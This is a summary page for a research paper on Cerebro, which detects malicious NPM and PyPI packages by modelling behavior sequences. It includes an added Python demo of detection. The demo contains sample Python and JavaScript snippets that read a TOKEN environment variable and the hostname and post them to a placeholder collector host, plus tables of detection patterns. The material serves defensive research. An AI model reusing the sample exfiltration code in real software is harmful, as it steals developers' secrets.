Killing Two Birds with One Stone: Malicious Package Detection in NPM and PyPI using a Single Model of Malicious Behavior Sequence

Junan Zhang, Kaifeng Huang, Yiheng Huang, Bihuan Chen, Ruisi Wang, Chong Wang, Xin Peng

TL;DR

This work tackles malicious package attacks in the NPM and PyPI ecosystems by introducing Cerebro, a unified framework that fuses cross-ecosystem knowledge and models malicious behavior as sequences. It combines a static feature extractor, a behavior sequence generator that preserves execution order, and a transformer-based classifier that is fine-tuned on bilingual data. Across a dataset of 2,675 malicious and 7,391 benign packages, Cerebro delivers higher precision and recall than state-of-the-art baselines while maintaining practical inference times, and demonstrates real-world utility through multi-month monitoring that yielded hundreds of true malicious detections. The approach highlights the value of cross-language semantic understanding and sequential modeling for OSS supply chain defense, with opportunities to broaden language support, improve false-positive handling, and extend deployment to additional ecosystems.

Abstract

The open-source software (OSS) supply chain enlarges the attack surface, which makes package registries attractive targets for attacks. Recently, the package registries NPM and PyPI have been flooded with malicious packages. The effectiveness of existing malicious NPM and PyPI package detection approaches is hindered by two challenges. The first challenge is how to leverage the knowledge of malicious packages from different ecosystems in a unified way such that multi-lingual malicious package detection becomes feasible. The second challenge is how to model malicious behavior in a sequential way such that maliciousness can be precisely captured. To address the two challenges, we propose and implement Cerebro to detect malicious packages in NPM and PyPI. We curate a feature set based on a high-level abstraction of malicious behavior to enable multi-lingual knowledge fusing. We organize extracted features into a behavior sequence to model sequential malicious behavior. We fine-tune the BERT model to understand the semantics of malicious behavior. Extensive evaluation has demonstrated the effectiveness of Cerebro over the state-of-the-art as well as its practically acceptable efficiency. Cerebro has successfully detected 306 and 196 new malicious packages in PyPI and NPM, and received 385 thank-you letters from the official PyPI and NPM teams.
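The two ideas in the abstract, a shared behavior abstraction across ecosystems and an ordered behavior sequence, shown as an added example (not code from the paper or from Cerebro). The token names, the API tables and both samples are assumptions made for illustration, and source order stands in here for the execution order the paper's sequence generator preserves.

```python
import ast
import re

# Hypothetical abstraction table (an assumption, not Cerebro's feature set):
# ecosystem-specific API names mapped to shared behavior tokens.
PY_APIS = {"os.environ.get": "read_env", "socket.gethostname": "read_host_info",
           "base64.b64decode": "decode_payload", "requests.post": "send_network",
           "subprocess.Popen": "spawn_process", "exec": "eval_code"}
JS_APIS = {"process.env": "read_env", "os.hostname": "read_host_info",
           "Buffer.from": "decode_payload", "https.request": "send_network",
           "child_process.exec": "spawn_process", "eval": "eval_code"}

# Constructed samples; they are only parsed as text, never executed.
PY_SAMPLE = '''import os, socket, requests
token = os.environ.get("TOKEN")
host = socket.gethostname()
requests.post("https://collector.example.invalid/u", data={"t": token, "h": host})
'''
JS_SAMPLE = '''const os = require("os"), https = require("https");
const token = process.env.TOKEN;
const host = os.hostname();
const req = https.request({host: "collector.example.invalid", method: "POST"});
'''

def _dotted(node):
    """Rebuild a dotted name such as os.environ.get from a call target."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        return ".".join(reversed(parts + [node.id]))
    return None  # target is not a plain dotted name (e.g. a call result)

def py_sequence(source):
    """Behavior tokens for Python source, ordered by source position."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call) and _dotted(node.func) in PY_APIS:
            hits.append((node.lineno, node.col_offset, PY_APIS[_dotted(node.func)]))
    return [token for _, _, token in sorted(hits)]

def js_sequence(source):
    """Behavior tokens for JavaScript source via a name scan (no JS parser)."""
    names = "|".join(re.escape(k) for k in sorted(JS_APIS, key=len, reverse=True))
    scan = re.compile(r"(?<![\w.])(?:" + names + r")\b")
    return [JS_APIS[m.group(0)] for m in scan.finditer(source)]

if __name__ == "__main__":
    print(py_sequence(PY_SAMPLE), js_sequence(JS_SAMPLE))
```

Both samples reduce to the same token sequence, which is what lets a single sequence classifier be trained on packages from both registries.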

Paper Structure (27 sections, 1 equation, 8 figures, 11 tables)

This paper contains 27 sections, 1 equation, 8 figures, 11 tables.

Figures (8)

  • Figure 1: Threats in the Package Registry Ecosystem
  • Figure 2: Malicious Packages from PyPI and NPM that Share Similar Malicious Behavior
  • Figure 3: A Malicious Package from PyPI with a Malicious Behavior Sequence
  • Figure 4: An Approach Overview of Cerebro for Detecting Malicious NPM and PyPI Packages
  • Figure 5: Extracted Feature Instances and Generated Behavior Sequence for the Package in Figure 3
  • ...and 3 more figures

Theorems & Definitions (3)

  • Example 4.1
  • Example 4.2
  • Example 4.3